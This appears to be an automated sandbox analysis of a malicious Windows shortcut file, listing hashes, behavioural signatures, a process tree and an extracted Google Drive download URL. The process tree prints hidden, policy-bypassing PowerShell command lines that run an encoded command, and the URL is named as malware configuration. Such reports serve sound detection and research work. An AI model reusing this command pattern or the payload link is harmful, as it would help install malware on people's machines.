Analysis
- max time kernel: 118s
- max time network: 130s
- platform: windows7_x64
- resource: win7-20231129-en
- resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
- submitted: 11-05-2024 11:54
Static task: static1
Behavioral task: behavioral1
  Sample: 34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
  Resource: win7-20231129-en
Behavioral task: behavioral2
  Sample: 34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
  Resource: win10v2004-20240226-en
General
- Target: 34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
- Size: 3KB
- MD5: 34759a7b254af5d435a747330e172602
- SHA1: d0d2d2abc845103bc0655fd6fcc74adc332d34f5
- SHA256: f79b3fb8b11748b9b8a68c316c805366e05f34b9c2bf41814191d03df53522ed
- SHA512: 4662b3e3f21ef000f569acb096f697e074b4425df67c3d3b34611cc65873cd02f17cf80edf5ba2a3b3287bd16e268d262f2f7706de5c275afbffc587e7b5bd72
Malware Config
- Extracted: https://drive.google.com/uc?export=download&id=1SCyn_ZPahvp66p8IWBybgyebqvi_tKj8
Signatures
- Blocklisted process makes network request (5 IoCs)
  Processes (flow, pid, process):
    5   3048  powershell.exe
    7   3048  powershell.exe
    10  3048  powershell.exe
    13  3048  powershell.exe
    15  3048  powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Run Powershell and hide display window.
  Processes (pid, process):
    2656  powershell.exe
    3048  powershell.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid, process):
    2656  powershell.exe
    3048  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, pid, process):
    Token: SeDebugPrivilege  2656  powershell.exe
    Token: SeDebugPrivilege  3048  powershell.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes (description, pid, process, target process):
    PID 2380 wrote to memory of 2656  2380  cmd.exe         powershell.exe
    PID 2380 wrote to memory of 2656  2380  cmd.exe         powershell.exe
    PID 2380 wrote to memory of 2656  2380  cmd.exe         powershell.exe
    PID 2656 wrote to memory of 2460  2656  powershell.exe  cmd.exe
    PID 2656 wrote to memory of 2460  2656  powershell.exe  cmd.exe
    PID 2656 wrote to memory of 2460  2656  powershell.exe  cmd.exe
    PID 2460 wrote to memory of 3048  2460  cmd.exe         powershell.exe
    PID 2460 wrote to memory of 3048  2460  cmd.exe         powershell.exe
    PID 2460 wrote to memory of 3048  2460  cmd.exe         powershell.exe
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
  Signatures:
    - Suspicious use of WriteProcessMemory
  ⤵
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd /c pOWersHELL.exe -Ex bypasS -W hiddeN -Ec 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
    Signatures:
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    ⤵
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c pOWersHELL.exe -Ex bypasS -W hiddeN -Ec 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
      Signatures:
        - Suspicious use of WriteProcessMemory
      ⤵
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: pOWersHELL.exe -Ex bypasS -W hiddeN -Ec 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
        Signatures:
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- memory/2656-38-0x000007FEF593E000-0x000007FEF593F000-memory.dmp (Filesize: 4KB)
- memory/2656-39-0x000000001B750000-0x000000001BA32000-memory.dmp (Filesize: 2.9MB)
- memory/2656-40-0x000007FEF5680000-0x000007FEF601D000-memory.dmp (Filesize: 9.6MB)
- memory/2656-43-0x000007FEF5680000-0x000007FEF601D000-memory.dmp (Filesize: 9.6MB)
- memory/2656-42-0x000007FEF5680000-0x000007FEF601D000-memory.dmp (Filesize: 9.6MB)
- memory/2656-44-0x000007FEF5680000-0x000007FEF601D000-memory.dmp (Filesize: 9.6MB)
- memory/2656-45-0x000007FEF5680000-0x000007FEF601D000-memory.dmp (Filesize: 9.6MB)
- memory/2656-41-0x0000000001EE0000-0x0000000001EE8000-memory.dmp (Filesize: 32KB)
- memory/2656-64-0x000007FEF5680000-0x000007FEF601D000-memory.dmp (Filesize: 9.6MB)